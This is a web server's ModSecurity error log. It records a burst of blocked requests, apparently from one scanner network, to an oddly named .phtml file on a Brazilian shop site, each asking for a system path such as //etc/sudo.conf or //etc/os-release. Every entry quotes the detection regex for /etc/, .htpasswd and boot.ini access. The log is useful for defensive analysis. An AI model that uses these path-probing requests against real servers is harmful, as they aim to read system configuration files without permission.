[Fri Mar 20 06:16:55.832247 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.110:57958] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qh_XLqtnMIWvjpaKGHQAAAog"]
[Fri Mar 20 06:16:56.274574 2026] [:error] [pid 11167:tid 140411708356352] [client 57.141.18.101:57964] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QiPHIg5MgXLBnicPljQAAAcQ"]
[Fri Mar 20 06:16:57.123535 2026] [:error] [pid 11167:tid 140411666392832] [client 57.141.18.27:58000] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QifHIg5MgXLBnicPljgAAAck"]
[Fri Mar 20 06:16:58.271055 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.107:57868] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QiuoXxyEfFpUF8f9tmwAAAVA"]
[Fri Mar 20 06:16:58.287559 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.103:58028] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QiuoXxyEfFpUF8f9tnAAAAUo"]
[Fri Mar 20 06:16:58.334186 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.43:58030] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QiuoXxyEfFpUF8f9tnQAAAVU"]
[Fri Mar 20 06:16:58.456274 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.36:57976] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QijJ3M9BSuKP7CAYDaQAAAIw"]
[Fri Mar 20 06:16:59.152588 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.106:58050] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qi-oXxyEfFpUF8f9tnwAAAVg"]
[Fri Mar 20 06:16:59.339511 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.29:58038] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QiwF0L0L-SsrnPo5TjAAAAtA"]
[Fri Mar 20 06:16:59.894069 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.40:58066] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qi-oXxyEfFpUF8f9togAAAUw"]
[Fri Mar 20 06:16:59.900320 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.12:58068] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qi11pVZ5mVmJwsFMb0QAAAFE"]
[Fri Mar 20 06:17:00.467780 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.18:58058] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjAF0L0L-SsrnPo5TjgAAAtM"]
[Fri Mar 20 06:17:00.684009 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.1:58086] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjDJ3M9BSuKP7CAYDagAAAJI"]
[Fri Mar 20 06:17:01.057130 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.2:58092] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjTJ3M9BSuKP7CAYDawAAAIQ"]
[Fri Mar 20 06:17:01.128933 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.28:58098] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjTJ3M9BSuKP7CAYDbAAAAJU"]
[Fri Mar 20 06:17:02.295978 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.48:58124] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjuoXxyEfFpUF8f9tqwAAAUc"]
[Fri Mar 20 06:17:02.489990 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.4:58080] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjuoXxyEfFpUF8f9trAAAAUo"]
[Fri Mar 20 06:17:02.876183 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.2:58144] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QjhCii7xarUs8iHZT8QAAAgU"]
[Fri Mar 20 06:17:03.665307 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.4:58168] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qj9a6ubjKNq_cu4a-NwAAA1Y"]
[Fri Mar 20 06:17:03.672012 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.49:58170] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qj_qxLDW4GITHUkTRTwAAARY"]
[Fri Mar 20 06:17:05.514643 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.41:58190] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qkda6ubjKNq_cu4a-OAAAA1g"]
[Fri Mar 20 06:17:05.515183 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.8:58184] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QkF1pVZ5mVmJwsFMb0gAAAFc"]
[Fri Mar 20 06:17:07.503873 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.116:58268] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QkxCii7xarUs8iHZT8wAAAgg"]
[Fri Mar 20 06:17:35.409066 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.59:59222] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qr7ninkcc-iUj5ApKSQAAA5g"]
[Fri Mar 20 06:17:45.396610 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.16:59574] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QuV1pVZ5mVmJwsFMb5wAAAEs"]
[Fri Mar 20 06:17:47.336071 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.70:59618] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QuzJ3M9BSuKP7CAYDjQAAAI4"]
[Fri Mar 20 06:17:50.751812 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.80:59724] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QvvHIg5MgXLBnicPlqgAAAcM"]
[Fri Mar 20 06:17:51.592466 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.69:59766] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QvwF0L0L-SsrnPo5TrgAAAtc"]
